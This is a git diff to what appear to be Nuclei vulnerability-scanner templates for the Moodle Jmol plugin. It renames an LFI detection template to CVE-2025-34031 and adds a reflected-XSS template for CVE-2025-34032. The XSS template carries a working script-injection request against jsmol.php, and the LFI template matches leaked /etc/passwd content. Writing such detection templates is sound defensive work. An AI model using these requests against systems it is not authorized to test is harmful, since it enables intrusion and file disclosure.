diff --git a/http/vulnerabilities/moodle/moodle-filter-jmol-lfi.yaml b/http/cves/2025/CVE-2025-34031.yaml
similarity index 62%
rename from http/vulnerabilities/moodle/moodle-filter-jmol-lfi.yaml
rename to http/cves/2025/CVE-2025-34031.yaml
index 0327636fd01b..07ef35b63e74 100644
--- a/http/vulnerabilities/moodle/moodle-filter-jmol-lfi.yaml
+++ b/http/cves/2025/CVE-2025-34031.yaml
@@ -1,19 +1,22 @@
-id: moodle-filter-jmol-lfi
+id: CVE-2025-34031
 
 info:
   name: Moodle Jmol Filter 6.1 - Local File Inclusion
   author: madrobot
   severity: high
-  description: Moodle is vulnerable to local file inclusion.
+  description: |
+    Moodle Jmol Filter 6.1 is vulnerable to local file inclusion through the jsmol.php file, allowing attackers to read arbitrary files on the server.
   reference:
     - https://www.exploit-db.com/exploits/46881
+    - https://nvd.nist.gov/vuln/detail/CVE-2025-34031
   classification:
-    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N/E:F/RL:W/RC:C
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N
+    cve-id: CVE-2025-34031
     cvss-score: 7.5
     cwe-id: CWE-22
   metadata:
     max-request: 1
-  tags: moodle,lfi,edb
+  tags: cve,cve2025,moodle,lfi,edb,jsmol
 
 http:
   - method: GET
@@ -22,12 +25,17 @@ http:
 
     matchers-condition: and
     matchers:
-      - type: status
-        status:
-          - 200
-
       - type: regex
+        part: body
         regex:
           - "root:.*:0:0:"
-        part: body
-# digest: 4b0a00483046022100f94185a8eabe63f53fbb9f491b50762b1b2d0cf5e86a0659f1ba8980e32c601102210096118270c1fa4708ceef2e9dac7592366eefe698b670ab81c5867034daa2833f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+
+      - type: word
+        part: content_type
+        words:
+          - "text/plain"
+
+      - type: status
+        status:
+          - 200
+# digest: 4b0a00483046022100f94185a8eabe63f53fbb9f491b50762b1b2d0cf5e86a0659f1ba8980e32c601102210096118270c1fa4708ceef2e9dac7592366eefe698b670ab81c5867034daa2833f:922c64590222798bb761d5b6d8e72950
diff --git a/http/cves/2025/CVE-2025-34032.yaml b/http/cves/2025/CVE-2025-34032.yaml
new file mode 100644
index 000000000000..95c989e25f23
--- /dev/null
+++ b/http/cves/2025/CVE-2025-34032.yaml
@@ -0,0 +1,38 @@
+id: CVE-2025-34032
+
+info:
+  name: Moodle LMS Jmol Plugin <= 6.1 - Cross-Site Scripting
+  author: madrobot,ritikchaddha
+  severity: medium
+  description: |
+    A reflected cross-site scripting (XSS) vulnerability exists in the Moodle LMS Jmol plugin version 6.1 and prior via the data parameter in jsmol.php. The application fails to properly sanitize user input before embedding it into the HTTP response, allowing an attacker to execute arbitrary JavaScript in the victim's browser by crafting a malicious link. This can be used to hijack user sessions or manipulate page content.
+  reference:
+    - https://www.dionach.com/blog/moodle-jmol-plugin-multiple-vulnerabilities/
+    - https://nvd.nist.gov/vuln/detail/CVE-2025-34032
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
+    cve-id: CVE-2025-34032
+    cvss-score: 5.4
+    cwe-id: CWE-80
+  metadata:
+    max-request: 1
+  tags: cve,cve2025,moodle,xss,edb
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/filter/jmol/js/jsmol/php/jsmol.php?call=saveFile&data=%3Cscript%3Ealert(document.domain)%3C/script%3E&mimetype=text/html"
+
+    matchers-condition: and
+    matchers:
+      - type: dsl
+        dsl:
+          - 'len(body) == 41'
+          - 'status_code == 200'
+          - 'contains(content_type, "text/html")'
+        condition: and
+
+      - type: regex
+        regex:
+          - '^<script>alert\(document\.domain\)</script>\s*$'
+# digest: 490a0046304402202ce4ab09dfbb0d1a283ed44ecf36d605d0ca9b1daf7c865bc6dff2377cae6fe302201755c894c9fb9d830625ffad6822664793240ae4e1f14fd340b92b5c2be20517:922c64590222798bb761d5b6d8e72950
diff --git a/http/vulnerabilities/moodle/moodle-filter-jmol-xss.yaml b/http/vulnerabilities/moodle/moodle-filter-jmol-xss.yaml
deleted file mode 100644
index 8af6bb1e208c..000000000000
--- a/http/vulnerabilities/moodle/moodle-filter-jmol-xss.yaml
+++ /dev/null
@@ -1,38 +0,0 @@
-id: moodle-filter-jmol-xss
-
-info:
-  name: Moodle Jsmol - Cross-Site Scripting
-  author: madrobot
-  severity: medium
-  description: Moodle contains a cross-site scripting vulnerability via the Jsmol plugin and may also be susceptible to local file inclusion or server-side-request forgery. An attacker can execute arbitrary script in the browser of an unsuspecting user and steal cookie-based authentication credentials and launch other attacks.
-  reference:
-    - https://www.dionach.com/blog/moodle-jmol-plugin-multiple-vulnerabilities/
-  classification:
-    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
-    cvss-score: 5.4
-    cwe-id: CWE-80
-  metadata:
-    max-request: 1
-  tags: moodle,xss
-
-http:
-  - method: GET
-    path:
-      - "{{BaseURL}}/filter/jmol/js/jsmol/php/jsmol.php?call=saveFile&data=%3Cscript%3Ealert(%27XSS%27)%3C/script%3E&mimetype=text/html"
-
-    matchers-condition: and
-    matchers:
-      - type: status
-        status:
-          - 200
-
-      - type: word
-        words:
-          - "<script>alert('XSS')</script>"
-        part: body
-
-      - type: word
-        part: header
-        words:
-          - "text/html"
-# digest: 490a0046304402202ce4ab09dfbb0d1a283ed44ecf36d605d0ca9b1daf7c865bc6dff2377cae6fe302201755c894c9fb9d830625ffad6822664793240ae4e1f14fd340b92b5c2be20517:922c64590222798bb761d5b6d8e72950
\ No newline at end of file